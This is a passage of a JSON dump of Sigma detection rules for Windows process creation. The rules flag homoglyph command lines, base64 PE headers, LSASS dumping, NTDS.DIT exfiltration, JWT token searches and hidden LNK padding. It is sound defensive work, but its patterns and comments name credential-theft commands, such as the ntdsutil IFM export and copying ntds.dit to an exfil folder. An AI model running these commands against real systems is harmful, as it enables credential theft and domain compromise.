В/B\n            - \"\\u0415\" # Е/E\n            - \"\\u041a\" # К/K\n            - \"\\u041c\" # М/M\n            - \"\\u041d\" # Н/H\n            - \"\\u041e\" # О/O\n            - \"\\u0420\" # Р/P\n            - \"\\u0421\" # С/C\n            - \"\\u0422\" # Т/T\n            - \"\\u0425\" # Х/X\n            - \"\\u0405\" # Ѕ/S\n            - \"\\u0406\" # І/I\n            - \"\\u0408\" # Ј/J\n            - \"\\u04ae\" # Ү/Y\n            - \"\\u04c0\" # Ӏ/I\n            - \"\\u050C\" # Ԍ/G\n            - \"\\u051a\" # Ԛ/Q\n            - \"\\u051c\" # Ԝ/W\n            - \"\\u0391\" # Α/A\n            - \"\\u0392\" # Β/B\n            - \"\\u0395\" # Ε/E\n            - \"\\u0396\" # Ζ/Z\n            - \"\\u0397\" # Η/H\n            - \"\\u0399\" # Ι/I\n            - \"\\u039a\" # Κ/K\n            - \"\\u039c\" # Μ/M\n            - \"\\u039d\" # Ν/N\n            - \"\\u039f\" # Ο/O\n            - \"\\u03a1\" # Ρ/P\n            - 
\"\\u03a4\" # Τ/T\n            - \"\\u03a5\" # Υ/Y\n            - \"\\u03a7\" # Χ/X\n    selection_lower:\n        CommandLine|contains:\n            - \"\\u0430\" # а/a\n            - \"\\u0435\" # е/e\n            - \"\\u043e\" # о/o\n            - \"\\u0440\" # р/p\n            - \"\\u0441\" # с/c\n            - \"\\u0445\" # х/x\n            - \"\\u0455\" # ѕ/s\n            - \"\\u0456\" # і/i\n            - \"\\u04cf\" # ӏ/l\n            - \"\\u0458\" # ј/j\n            - \"\\u04bb\" # һ/h\n            - \"\\u0501\" # ԁ/d\n            - \"\\u051b\" # ԛ/q\n            - \"\\u051d\" # ԝ/w\n            - \"\\u03bf\" # ο/o\n    condition: 1 of selection_*\nfalsepositives:\n    - Commandlines with legitimate Cyrillic text; will likely require tuning (or not be usable) in countries where these alphabets are in use.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_image_missing.yml",
    "content": "title: Execution Of Non-Existing File\nid: 71158e3f-df67-472b-930e-7d287acaa3e1\nstatus: test\ndescription: Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)\nreferences:\n    - https://pentestlaboratories.com/2021/12/08/process-ghosting/\nauthor: Max Altgelt (Nextron Systems)\ndate: 2021-12-09\nmodified: 2022-12-14\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    image_absolute_path:\n        Image|contains: '\\'\n    filter_null:\n        Image: null\n    filter_empty:\n        Image:\n            - '-'\n            - ''\n    filter_4688:\n        - Image:\n              - 'System'\n              - 'Registry'\n              - 'MemCompression'\n              - 'vmmem'\n        - CommandLine:\n              - 'Registry'\n              - 'MemCompression'\n              - 'vmmem'\n    condition: not image_absolute_path and not 1 of filter*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_inline_base64_mz_header.yml",
    "content": "title: Base64 MZ Header In CommandLine\nid: 22e58743-4ac8-4a9f-bf19-00a0428d8c5f\nstatus: test\ndescription: Detects encoded base64 MZ header in the commandline\nreferences:\n    - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-12\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - 'TVqQAAMAAAAEAAAA' # MZ..........\n            - 'TVpQAAIAAAAEAA8A'\n            - 'TVqAAAEAAAAEABAA'\n            - 'TVoAAAAAAAAAAAAA'\n            - 'TVpTAQEAAAAEAAAA'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_inline_node_js_execution.yml",
    "content": "title: Potentially Suspicious Inline JavaScript Execution via NodeJS Binary\nid: 8537c866-072e-460d-bfff-aaf39cbd73d3\nstatus: experimental\ndescription: Detects potentially suspicious inline JavaScript execution using Node.js with specific keywords in the command line.\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2025/04/15/threat-actors-misuse-node-js-to-deliver-malware-and-other-malicious-payloads/\nauthor: Microsoft (idea), Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-04-21\ntags:\n    - attack.execution\n    - attack.t1059.007\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\node.exe'\n        - OriginalFileName: 'node.exe'\n        - Product: 'Node.js'\n    selection_cmd:\n        CommandLine|contains|all:\n            - 'http'\n            - 'execSync'\n            - 'spawn'\n            - 'fs'\n            - 'path'\n            - 'zlib'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate scripts using Node.js with these modules\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_inline_win_api_access.yml",
    "content": "title: Potential WinAPI Calls Via CommandLine\nid: ba3f5c1b-6272-4119-9dbd-0bc8d21c2702\nrelated:\n    - id: 03d83090-8cba-44a0-b02f-0b756a050306\n      type: derived\nstatus: test\ndescription: Detects the use of WinAPI functions via the command line, as seen used by threat actors via the tool winapiexec\nreferences:\n    - https://twitter.com/m417z/status/1566674631788007425\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-06\nmodified: 2025-03-06\ntags:\n    - attack.execution\n    - attack.t1106\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - 'AddSecurityPackage'\n            - 'AdjustTokenPrivileges'\n            - 'Advapi32'\n            - 'CloseHandle'\n            - 'CreateProcessWithToken'\n            - 'CreatePseudoConsole'\n            - 'CreateRemoteThread'\n            - 'CreateThread'\n            - 'CreateUserThread'\n            - 'DangerousGetHandle'\n            - 'DuplicateTokenEx'\n            - 'EnumerateSecurityPackages'\n            - 'FreeHGlobal'\n            - 'FreeLibrary'\n            - 'GetDelegateForFunctionPointer'\n            - 'GetLogonSessionData'\n            - 'GetModuleHandle'\n            - 'GetProcAddress'\n            - 'GetProcessHandle'\n            - 'GetTokenInformation'\n            - 'ImpersonateLoggedOnUser'\n            - 'kernel32'\n            - 'LoadLibrary'\n            - 'memcpy'\n            - 'MiniDumpWriteDump'\n            # - 'msvcrt'\n            - 'ntdll'\n            - 'OpenDesktop'\n            - 'OpenProcess'\n            - 'OpenProcessToken'\n            - 'OpenThreadToken'\n            - 'OpenWindowStation'\n            - 'PtrToString'\n            - 'QueueUserApc'\n            - 'ReadProcessMemory'\n            - 'RevertToSelf'\n            - 'RtlCreateUserThread'\n            - 'secur32'\n            - 'SetThreadToken'\n            # - 'user32'\n            - 'VirtualAlloc'\n            - 'VirtualFree'\n            - 'VirtualProtect'\n            - 'WaitForSingleObject'\n            - 'WriteInt32'\n            - 'WriteProcessMemory'\n            - 'ZeroFreeGlobalAllocUnicode'\n    filter_optional_mpcmdrun:\n        Image|endswith: '\\MpCmdRun.exe'\n        CommandLine|contains: 'GetLoadLibraryWAddress32'\n    filter_optional_compatTelRunner:\n        ParentImage|endswith: '\\CompatTelRunner.exe'\n        CommandLine|contains:\n            - 'FreeHGlobal'\n            - 'PtrToString'\n            - 'kernel32'\n            - 'CloseHandle'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Some legitimate actions or applications may use these functions. Investigate further to determine the legitimacy of the activity.\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_jwt_token_search.yml",
    "content": "title: Potentially Suspicious JWT Token Search Via CLI\nid: 6d3a3952-6530-44a3-8554-cf17c116c615\nstatus: test\ndescription: |\n    Detects potentially suspicious search for JWT tokens via CLI by looking for the string \"eyJ0eX\" or \"eyJhbG\".\n    JWT tokens are often used for access-tokens across various applications and services like Microsoft 365, Azure, AWS, Google Cloud, and others.\n    Threat actors may search for these tokens to steal them for lateral movement or privilege escalation.\nreferences:\n    - https://mrd0x.com/stealing-tokens-from-office-applications/\n    - https://www.scip.ch/en/?labs.20240523\nauthor: Nasreddine Bencherchali (Nextron Systems), kagebunsher\ndate: 2022-10-25\nmodified: 2025-10-21\ntags:\n    - attack.credential-access\n    - attack.t1528\n    - attack.t1552.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_tools:\n        CommandLine|contains:\n            - 'find '\n            - 'find.exe'\n            - 'findstr'\n            - 'select-string '\n            - 'strings'\n    selection_jwt_string:\n        CommandLine|contains:\n            - 'eyJ0eXAiOi' # {\"typ\":\n            - 'eyJhbGciOi' # {\"alg\":\n            - ' eyJ0eX'\n            - ' \"eyJ0eX\"'\n            - \" 'eyJ0eX'\"\n            - ' eyJhbG'\n            - ' \"eyJhbG\"'\n            - \" 'eyJhbG'\"\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_lnk_exec_hidden_cmd.yml",
    "content": "title: Suspicious LNK Command-Line Padding with Whitespace Characters\nid: dd8756e7-a3a0-4768-b47e-8f545d1a751c\nstatus: experimental\ndescription: |\n    Detects exploitation of LNK file command-line length discrepancy, where attackers hide malicious commands beyond the 260-character UI limit while the actual command-line argument field supports 4096 characters using whitespace padding (e.g., 0x20, 0x09-0x0D).\n    Adversaries insert non-printable whitespace characters (e.g., Line Feed \\x0A, Carriage Return \\x0D) to pad the visible section of the LNK file, pushing malicious commands past the UI-visible boundary.\n    The hidden payload, executed at runtime but invisible in Windows Explorer properties, enables stealthy execution and evasion—commonly used for social engineering attacks.\n    This rule flags suspicious use of such padding observed in real-world attacks.\nreferences:\n    - https://syedhasan010.medium.com/forensics-analysis-of-an-lnk-file-da68a98b8415\n    - https://thehackernews.com/2025/03/unpatched-windows-zero-day-flaw.html\n    - https://www.trendmicro.com/en_us/research/25/c/windows-shortcut-zero-day-exploit.html\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-03-19\ntags:\n    - attack.initial-access\n    - attack.execution\n    - attack.t1204.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - ParentImage|endswith: '\\explorer.exe'\n        - ParentCommandLine|contains: '.lnk'\n    selection_cmd:\n        - CommandLine|contains:\n              - '                 '  # Padding of SPACE (0x20)\n            # - '\t'  # Horizontal Tab (0x9)\n              - '\\u0009'\n              - '\\u000A' # Line Feed\n              - '\\u0011'\n              - '\\u0012'\n              - '\\u0013'\n              - '\\u000B' # Vertical Tab\n              - '\\u000C'  # \\x0C\n              - '\\u000D'  # \\x0D\n        - CommandLine|re: '\\n\\n\\n\\n\\n\\n' # In some cases \\u000[ABCD] are represented as a newline in the eventlog\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_local_system_owner_account_discovery.yml",
    "content": "title: Local Accounts Discovery\nid: 502b42de-4306-40b4-9596-6f590c81f073\nstatus: test\nrelated:\n    - id: e28a5a99-da44-436d-b7a0-2afc20a5f413 # Whoami Utility Execution\n      type: obsolete\ndescription: Detects local account and system owner/user discovery using operating system utilities\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md\nauthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community\ndate: 2019-10-21\nmodified: 2025-10-20\ntags:\n    - attack.discovery\n    - attack.t1033\n    - attack.t1087.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_other_img:\n        - Image|endswith:\n              - '\\whoami.exe'\n              - '\\quser.exe'\n              - '\\qwinsta.exe'\n        - OriginalFileName:\n              - 'whoami.exe'\n              - 'quser.exe'\n              - 'qwinsta.exe'\n    selection_other_wmi:\n        Image|endswith: '\\wmic.exe'\n        CommandLine|contains|all:\n            - 'useraccount'\n            - 'get'\n    selection_other_cmdkey:\n        Image|endswith: '\\cmdkey.exe'\n        CommandLine|contains: ' /l'\n    selection_cmd:\n        Image|endswith: '\\cmd.exe'\n        CommandLine|contains|all:\n            - ' /c'\n            - 'dir '\n            - '\\Users\\'\n    filter_cmd:\n        CommandLine|contains: ' rmdir ' # don't match on 'dir'   \"C:\\Windows\\System32\\cmd.exe\" /q /c rmdir /s /q \"C:\\Users\\XX\\AppData\\Local\\Microsoft\\OneDrive\\19.232.1124.0005\"\n    selection_net:\n        Image|endswith:\n            - '\\net.exe'\n            - '\\net1.exe'\n        CommandLine|contains: 'user'\n    filter_net:\n        CommandLine|contains:\n            - '/domain'       # local account discovery only\n            - '/add'          # discovery only\n            - '/delete'       # discovery only\n            - '/active'       # discovery only\n            - '/expires'      # discovery only\n            - '/passwordreq'  # discovery only\n            - '/scriptpath'   # discovery only\n            - '/times'        # discovery only\n            - '/workstations' # discovery only\n    condition: (selection_cmd and not filter_cmd) or (selection_net and not filter_net) or 1 of selection_other_*\nfalsepositives:\n    - Legitimate administrator or user enumerating local users for a legitimate reason\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_lolbin_exec_from_non_c_drive.yml",
    "content": "title: LOLBIN Execution From Abnormal Drive\nid: d4ca7c59-e9e4-42d8-bf57-91a776efcb87\nrelated:\n    - id: 5b80cf53-3a46-4adc-960b-05ec19348d74\n      type: similar\nstatus: test\ndescription: Detects LOLBINs executing from an abnormal or uncommon drive such as a mounted ISO.\nreferences:\n    - https://thedfirreport.com/2021/12/13/diavol-ransomware/\n    - https://www.scythe.io/library/threat-emulation-qakbot\n    - https://sec-consult.com/blog/detail/bumblebee-hunting-with-a-velociraptor/\nauthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Angelo Violetti - SEC Consult '@angelo_violetti', Aaron Herman\ndate: 2022-01-25\nmodified: 2023-08-29\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        # Note: add more lolbins for additional coverage\n        - Image|endswith:\n              - '\\calc.exe'\n              - '\\certutil.exe'\n              - '\\cmstp.exe'\n              - '\\cscript.exe'\n              - '\\installutil.exe'\n              - '\\mshta.exe'\n              - '\\regsvr32.exe'\n              - '\\rundll32.exe'\n              - '\\wscript.exe'\n        - OriginalFileName:\n              - 'CALC.EXE'\n              - 'CertUtil.exe'\n              - 'CMSTP.EXE'\n              - 'cscript.exe'\n              - 'installutil.exe'\n              - 'MSHTA.EXE'\n              - 'REGSVR32.EXE'\n              - 'RUNDLL32.EXE'\n              - 'wscript.exe'\n    filter_main_currentdirectory:\n        CurrentDirectory|contains: 'C:\\'\n    filter_main_empty:\n        CurrentDirectory: ''\n    filter_main_null:\n        CurrentDirectory: null\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Rare false positives could occur on servers with multiple drives.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_lsass_dmp_cli_keywords.yml",
    "content": "title: LSASS Dump Keyword In CommandLine\nid: ffa6861c-4461-4f59-8a41-578c39f3f23e\nrelated:\n    - id: a5a2d357-1ab8-4675-a967-ef9990a59391\n      type: derived\nstatus: test\ndescription: |\n    Detects the presence of the keywords \"lsass\" and \".dmp\" in the commandline, which could indicate a potential attempt to dump or create a dump of the lsass process.\nreferences:\n    - https://github.com/Hackndo/lsassy\n    - https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf\n    - https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml\n    - https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/\n    - https://github.com/helpsystems/nanodump\n    - https://github.com/CCob/MirrorDump\nauthor: E.M. Anhaus, Tony Lambert, oscd.community, Nasreddine Bencherchali (Nextron Systems)\ndate: 2019-10-24\nmodified: 2023-08-29\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - CommandLine|contains:\n              - 'lsass.dmp'\n              - 'lsass.zip'\n              - 'lsass.rar'\n              - 'Andrew.dmp'\n              - 'Coredump.dmp'\n              - 'NotLSASS.zip'  # https://github.com/CCob/MirrorDump\n              - 'lsass_2'  # default format of procdump v9.0 is lsass_YYMMDD_HHmmss.dmp\n              - 'lsassdump'\n              - 'lsassdmp'\n        - CommandLine|contains|all:\n              - 'lsass'\n              - '.dmp'\n        - CommandLine|contains|all:\n              - 'SQLDmpr'\n              - '.mdmp'\n        - CommandLine|contains|all:\n              - 'nanodump'\n              - '.dmp'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_ms_appinstaller_download.yml",
    "content": "title: Potential File Download Via MS-AppInstaller Protocol Handler\nid: 180c7c5c-d64b-4a63-86e9-68910451bc8b\nrelated:\n    - id: 7cff77e1-9663-46a3-8260-17f2e1aa9d0a\n      type: derived\nstatus: test\ndescription: |\n    Detects usage of the \"ms-appinstaller\" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE.\n    The downloaded files are temporarily stored in \":\\Users\\%username%\\AppData\\Local\\Packages\\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\\AC\\INetCache\\<RANDOM-8-CHAR-DIRECTORY>\"\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/\nauthor: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel\ndate: 2023-11-09\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'ms-appinstaller://?source='\n            - 'http'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_network_command.yml",
    "content": "title: Suspicious Network Command\nid: a29c1813-ab1f-4dde-b489-330b952e91ae\nstatus: test\ndescription: Detects network configuration discovery commands. Adversaries may look for details about the network configuration and settings of systems they access, or discover this information about remote systems\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-1---system-network-configuration-discovery-on-windows\nauthor: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'\ndate: 2021-12-07\nmodified: 2025-10-19\ntags:\n    - attack.discovery\n    - attack.t1016\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|re:\n            - 'ipconfig\\s+/all'\n            - 'netsh\\s+interface show interface'\n            - 'arp\\s+-a'\n            - 'nbtstat\\s+-n'\n            - 'net\\s+config'\n            - 'route\\s+print'\n    condition: selection\nfalsepositives:\n    - Administrator activity, or a support hotline asking a user to run these commands\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_network_scan_loop.yml",
    "content": "title: Suspicious Scan Loop Network\nid: f8ad2e2c-40b6-4117-84d7-20b89896ab23\nstatus: test\ndescription: Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md\n    - https://ss64.com/nt/for.html\n    - https://ss64.com/ps/foreach-object.html\nauthor: frack113\ndate: 2022-03-12\ntags:\n    - attack.execution\n    - attack.t1059\n    - attack.discovery\n    - attack.t1018\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_loop:\n        CommandLine|contains:\n            - 'for '\n            - 'foreach '\n    selection_tools:\n        CommandLine|contains:\n            - 'nslookup'\n            - 'ping'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate script\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_network_sniffing.yml",
    "content": "title: Potential Network Sniffing Activity Using Network Tools\nid: ba1f7802-adc7-48b4-9ecb-81e227fddfd5\nstatus: test\ndescription: |\n    Detects potential network sniffing via use of network tools such as \"tshark\", \"windump\".\n    Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.\n    An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md\nauthor: Timur Zinniatullin, oscd.community, Nasreddine Bencherchali (Nextron Systems)\ndate: 2019-10-21\nmodified: 2023-02-20\ntags:\n    - attack.credential-access\n    - attack.discovery\n    - attack.t1040\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_tshark:\n        Image|endswith: '\\tshark.exe'\n        CommandLine|contains: '-i'\n    selection_windump:\n        Image|endswith: '\\windump.exe'\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate administration activity to troubleshoot network issues\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_no_image_name.yml",
    "content": "title: Process Launched Without Image Name\nid: f208d6d8-d83a-4c2c-960d-877c37da84e5\nstatus: test\ndescription: Detects the execution of processes with no image name (the image path ends in just \".exe\"), which can be used to evade Image-based detections.\nreferences:\n    - https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software\nauthor: Matt Anderson (Huntress)\ndate: 2024-07-23\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\.exe'\n    condition: selection\nfalsepositives:\n    - Rare legitimate software.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml",
    "content": "title: Execution of Suspicious File Type Extension\nid: c09dad97-1c78-4f71-b127-7edb2b8e491a\nstatus: test\ndescription: |\n    Detects whether the image specified in a process creation event doesn't refer to an \".exe\" (or other known executable extension) file. This can be caused by process ghosting or other unorthodox methods to start a process.\n    This rule might require some initial baselining to align with some third party tooling in the user environment.\nreferences:\n    - https://pentestlaboratories.com/2021/12/08/process-ghosting/\nauthor: Max Altgelt (Nextron Systems)\ndate: 2021-12-09\nmodified: 2023-11-23\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    known_image_extension:\n        Image|endswith:\n            - '.bin'\n            - '.cgi'\n            - '.com'\n            - '.exe'\n            - '.scr'\n            - '.tmp' # sadly many installers use this extension\n    filter_main_image: # Windows utilities without extension\n        Image:\n            - 'System'\n            - 'Registry'\n            - 'MemCompression'\n            - 'vmmem'\n    filter_main_msi_installers:\n        Image|contains: ':\\Windows\\Installer\\MSI'\n    filter_main_driver_store:\n        Image|contains: ':\\Windows\\System32\\DriverStore\\FileRepository\\'\n    filter_main_msi_rollbackfiles:\n        Image|contains: ':\\Config.Msi\\'\n        Image|endswith:\n            - '.rbf'\n            - '.rbs'\n    filter_main_windows_temp:\n        - ParentImage|contains: ':\\Windows\\Temp\\'\n        - Image|contains: ':\\Windows\\Temp\\'\n    filter_main_deleted:\n        Image|contains: ':\\$Extend\\$Deleted\\'\n    filter_main_empty:\n        Image:\n            - '-'\n            - ''\n    filter_main_null:\n        Image: null\n    filter_optional_avira:\n        ParentImage|contains: ':\\ProgramData\\Avira\\'\n    filter_optional_nvidia:\n        Image|contains: 'NVIDIA\\NvBackend\\'\n        Image|endswith: '.dat'\n    filter_optional_winpakpro:\n        Image|contains:\n            - ':\\Program Files (x86)\\WINPAKPRO\\'\n            - ':\\Program Files\\WINPAKPRO\\'\n        Image|endswith: '.ngn'\n    filter_optional_myq_server:\n        Image|endswith:\n            - ':\\Program Files (x86)\\MyQ\\Server\\pcltool.dll'\n            - ':\\Program Files\\MyQ\\Server\\pcltool.dll'\n    filter_optional_wsl:\n        Image|contains|all:\n            - '\\AppData\\Local\\Packages\\'\n            - '\\LocalState\\rootfs\\'\n    filter_optional_lzma_exe:\n        Image|endswith: '\\LZMA_EXE'\n    filter_optional_firefox:\n        Image|contains: ':\\Program Files\\Mozilla Firefox\\'\n    filter_optional_docker:\n        ParentImage: 'C:\\Windows\\System32\\services.exe'\n        Image|endswith: 'com.docker.service'\n    condition: not known_image_extension and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_non_priv_reg_or_ps.yml",
    "content": "title: Non-privileged Usage of Reg or Powershell\nid: 8f02c935-effe-45b3-8fc9-ef8696a9e41d\nstatus: test\ndescription: Detects usage of reg or PowerShell by non-privileged users to modify service configuration in the registry\nreferences:\n    - https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-20-638.jpg\nauthor: Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community\ndate: 2020-10-05\nmodified: 2024-12-01\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_cli:\n        - CommandLine|contains|all:\n              - 'reg '\n              - 'add'\n        - CommandLine|contains:\n              - 'powershell'\n              - 'set-itemproperty'\n              - ' sp '\n              - 'new-itemproperty'\n    selection_data:\n        IntegrityLevel:\n            - 'Medium'\n            - 'S-1-16-8192'\n        CommandLine|contains|all:\n            - 'ControlSet'\n            - 'Services'\n        CommandLine|contains:\n            - 'ImagePath'\n            - 'FailureCommand'\n            - 'ServiceDLL'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_ntds.yml",
    "content": "title: Suspicious Process Patterns NTDS.DIT Exfil\nid: 8bc64091-6875-4881-aaf9-7bd25b5dda08\nstatus: test\ndescription: Detects suspicious process patterns used in NTDS.DIT exfiltration\nreferences:\n    - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration\n    - https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/\n    - https://pentestlab.blog/tag/ntds-dit/\n    - https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1\n    - https://github.com/zcgonvh/NTDSDumpEx\n    - https://github.com/rapid7/metasploit-framework/blob/d297adcebb5c1df6fe30b12ca79b161deb71571c/data/post/powershell/NTDSgrab.ps1\n    - https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-03-11\nmodified: 2022-11-10\ntags:\n    - attack.credential-access\n    - attack.t1003.003\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_tool:\n        # https://github.com/zcgonvh/NTDSDumpEx\n        - Image|endswith:\n              - '\\NTDSDump.exe'\n              - '\\NTDSDumpEx.exe'\n        - CommandLine|contains|all:\n              # ntdsdumpex.exe -d ntds.dit -o hash.txt -s system.hiv\n              - 'ntds.dit'\n              - 'system.hiv'\n        - CommandLine|contains: 'NTDSgrab.ps1'\n    selection_oneliner_1:\n        # powershell \"ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\\temp' q q\"\n        CommandLine|contains|all:\n            - 'ac i ntds'\n            - 'create full'\n    selection_onliner_2:\n        # cmd.exe /c copy z:\\windows\\ntds\\ntds.dit c:\\exfil\\ntds.dit\n        CommandLine|contains|all:\n            - '/c copy '\n            - '\\windows\\ntds\\ntds.dit'\n    selection_onliner_3:\n        # ntdsutil \"activate instance ntds\" \"ifm\" \"create full c:\\windows\\temp\\data\\\" \"quit\" \"quit\"\n        CommandLine|contains|all:\n            - 'activate instance ntds'\n            - 'create full'\n    selection_powershell:\n        CommandLine|contains|all:\n            - 'powershell'\n            - 'ntds.dit'\n    set1_selection_ntds_dit:\n        CommandLine|contains: 'ntds.dit'\n    set1_selection_image_folder:\n        - ParentImage|contains:\n              - '\\apache'\n              - '\\tomcat'\n              - '\\AppData\\'\n              - '\\Temp\\'\n              - '\\Public\\'\n              - '\\PerfLogs\\'\n        - Image|contains:\n              - '\\apache'\n              - '\\tomcat'\n              - '\\AppData\\'\n              - '\\Temp\\'\n              - '\\Public\\'\n              - '\\PerfLogs\\'\n    condition: 1 of selection* or all of set1*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_nteventlogfile_usage.yml",
    "content": "title: Potentially Suspicious Call To Win32_NTEventlogFile Class\nid: caf201a9-c2ce-4a26-9c3a-2b9525413711\nrelated:\n    - id: e2812b49-bae0-4b21-b366-7c142eafcde2\n      type: similar\nstatus: test\ndescription: Detects usage of the WMI class \"Win32_NTEventlogFile\" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa394225(v=vs.85)\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-07-13\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_class:\n        CommandLine|contains: 'Win32_NTEventlogFile'\n    selection_function:\n        CommandLine|contains:\n            - '.BackupEventlog('\n            - '.ChangeSecurityPermissions('\n            - '.ChangeSecurityPermissionsEx('\n            - '.ClearEventLog('\n            - '.Delete('\n            - '.DeleteEx('\n            - '.Rename('\n            - '.TakeOwnerShip('\n            - '.TakeOwnerShipEx('\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_image.yml",
